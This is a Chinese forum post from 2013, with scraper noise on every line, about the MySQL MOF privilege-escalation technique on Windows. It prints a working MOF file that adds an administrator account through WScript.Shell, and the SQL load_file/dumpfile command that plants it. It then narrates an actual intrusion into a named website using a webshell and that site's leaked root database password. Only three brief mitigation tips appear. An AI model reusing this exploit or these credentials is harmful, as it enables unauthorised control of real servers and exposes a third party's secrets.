Mysql mof扩展漏洞防范方法) d0 @5 o$ P( g$ J: X( R
7 i5 ]# L8 F& d u B+ a, N
网上公开的一些利用代码:9 I9 L/ o1 H7 ~( c$ y, ?
. l: y" A8 o% f# m#pragma namespace(“\\\\.\\root\\subscription”)! `, \) ^/ i' q
& z; ^! `1 F* u. ~. \instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };$ Y5 ~/ J+ i0 l
# b9 [+ s! G$ u8 Q/ Z! X/ C + g4 y8 z9 z. N+ {7 G
; J2 _0 ]" J$ t: n, N
7 C# ~" F/ y+ w! O4 C
7 B! ^0 `1 }' z5 i; X连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;7 t- R: L c: u! j, |5 |
从上面代码来看得出解决办法:: Y9 |6 i6 H7 I; U" [
( J+ o& F: k3 k/ q7 l5 ^ C
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
4 R/ {6 f% b/ j0 D8 s1 a7 m" h6 D+ P6 d* `: @4 S
2、禁止使用”WScript.Shel”组件
1 @% m/ q, ~% `4 u7 W# [5 `$ m# F2 h! ]: a& x& |
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
* C+ s4 M# M3 T/ Y$ b, |. _& A# d2 u5 L5 J
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下. g0 A3 y2 d" \% J q* i
0 f k- T# A8 n5 C9 j4 b
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权- l+ A+ q6 L" I5 I5 X
8 A# ^8 j" s( l& H5 e' ]但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容 d+ ^; n/ U4 y* I
3 [+ c/ `. B! u3 H3 d看懂了后就开始练手吧$ L8 t3 i0 @# T$ F$ ]
l* K0 B4 k u2 Y3 shttp://www.webbmw.com/config/config_ucenter.php 一句话 a) a+ p& z4 {* v0 d; M. t
* l& d% k# k7 X$ F' |$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。3 T. S2 ?) L' y0 F
6 j4 `- E: G% F- X9 [8 o( s- W a于是直接用菜刀开搞
, X+ C* h( E% u! _* @4 p, V$ v- L, }* i- o% }6 B5 }0 b
上马先3 x7 p! w( f$ C& ~
. |0 p0 X9 h/ [" s. `既然有了那些账号 之类的 于是我们就执行吧…….# U+ f/ q: [; l
9 ]# B o5 v( X4 h* r小小的说下3 e+ d7 r& D" j+ V7 ~! k2 i
% K6 _0 a, g* M" [) ]2 a在这里第1次执行未成功 原因未知+ K+ Q4 Z$ }2 @3 B J/ V
0 E7 h `+ E6 O" S( I, P" z( }
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
0 {% g7 V: e# `8 O# r) T
* S; e0 n( }5 I$ b: Z& T#pragma namespace(“\\\\.\\root\\subscription”)) c5 z. w) U$ X, `* I
7 ]4 a4 s" M: |. X l( Vinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };9 I4 l4 _2 f+ Y- |
" }4 V$ h( ~& g, g- T2 E我是将文件放到C:\WINDOWS\temp\1.mof
: A" w" P7 \$ i0 b0 l, g2 o
' B2 k0 O2 ?8 J# |5 V; j- a8 K所以我们就改下执行的代码
2 z% [& j! {, P2 c9 L
3 U* n2 b. }" E' W" [8 Pselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;$ f; q$ B2 [* }7 y
+ z f" B3 G- u9 d; _* ? J
6 }: a4 k3 b6 W1 W, E, A6 d2 _. G' d( }& s4 y+ U
但是 你会发现账号还是没有躺在那里。。
{+ e5 m/ w; p' k2 [- F |) G3 q8 M* s C0 M5 j3 i% x3 f5 A. o
于是我就感觉蛋疼# v- a$ |2 y9 B+ r. n1 {
2 P: D: l0 {7 i; Z; w8 |4 ~* W就去一个一个去执行 但是执行到第2个 mysql时就成功了………0 K+ m" \8 A0 `$ U) `
0 s/ I m. B9 H7 n: {
* e' k. _( X3 X/ |5 O5 P" s+ S9 `) e8 L7 z
但是其他库均不成功…8 T9 t/ N) c1 I# Y
; H! k, a0 ]# C4 i我就很费解呀 到底为什么不成功求大牛解答…
6 h# u% o* [" O9 R( X3 _+ u
# E- m3 X+ D: l ]4 U4 ?+ f* v, X; H8 K# M2 t7 l9 N
+ J$ ~ J, n6 w" v2 l, N
|
发表于 2013-1-4 19:49:49
收藏
支持
反对